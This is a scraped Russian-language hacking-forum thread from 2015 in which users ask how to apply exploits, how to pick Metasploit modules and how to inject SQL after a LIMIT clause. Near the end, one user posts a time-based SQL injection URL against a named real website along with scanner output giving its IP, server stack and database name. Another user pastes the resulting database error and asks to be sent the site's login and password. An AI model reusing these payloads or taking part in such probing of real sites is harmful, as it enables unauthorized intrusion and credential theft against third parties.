Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. TopTG

    TopTG New Member

    Joined:
    14 Oct 2015
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    спасибо за ответ. как я понял по ссылке список уязвимость. но как человек имеющий базовые знания но первый раз сталкивающийся с этим, можете в качестве примеров описать коротко по шагам как это применять, по примерам я пойму не совсем чайник.
     
  2. TopTG

    TopTG New Member

    Joined:
    14 Oct 2015
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    и вам спасибо за ответ, по ссылке кнопка скачать.. дальше что делать как применять, пожалуйста не бросайте, объясните как надо я пойму.. очень нужны файлы!
     
  3. kpa6

    kpa6 Banned

    Joined:
    4 Sep 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Приветствую!
    Как в Metasploit подобрать нужный эксплоит?
    Руками тыкать ужасно долго и нудно.
    Есть ли альтернатива?
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    как крутится Инъекция в LIMIT после ORDER BY?
     
    #764 qaz, 25 Oct 2015
    Last edited: 25 Oct 2015
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    PROCEDURE ANALYSE мб?
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    хз,
    к примеру запрос
    select * from article order by id limit 100,25
    как мне составить запрос на выборку из другой таблици?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    вам выше подсказали. либо blind, либо error-based. на рдоте есть статья
     
    _________________________
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    что мне подсазали? мне написали пару слов
    вот я спросил как составить запрос, так как мало представляю о том что можно вставить после лимита
    ПС: рдот лежит уже давно
     
  9. }{@ker

    }{@ker New Member

    Joined:
    27 Apr 2007
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
  10. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
  11. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Вывод ошибок есть?
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    да
     
  13. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
    qaz likes this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    _________________________
    segodnya likes this.
  16. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    #776 segodnya, 26 Oct 2015
    Last edited: 26 Oct 2015
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    как не видешь
    это уже сам
     
    _________________________
  18. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    qaz likes this.
  19. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'--
    Target: http://stop-obman.ru/organizations.html?rid=1
    Host IP: 217.12.206.101
    Web Server: nginx
    Powered-by: PHP/5.3.3
    DB Server: MySQL error based
    Resp. Time(avg): 889 ms
    Sql Version: 5.1.73
    Current DB: raferti_stopobman
    Host Name: rafer685.vds
    Compile OS: redhat-linux-gnu
    Installation dir: /usr/
     
  20. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    :(

    CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.' at line 1. The SQL statement executed was: SELECT COUNT(DISTINCT `t`.`id`) FROM `subject` `t` LEFT OUTER JOIN `organization` `rl_orgs` ON (`rl_orgs`.`subject`=`t`.`id`) WHERE (((((type='1') AND (rl_orgs.region = '1 WAITFOR DELAY '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.enable=1))

    если получится, скинь логин/пароль в лс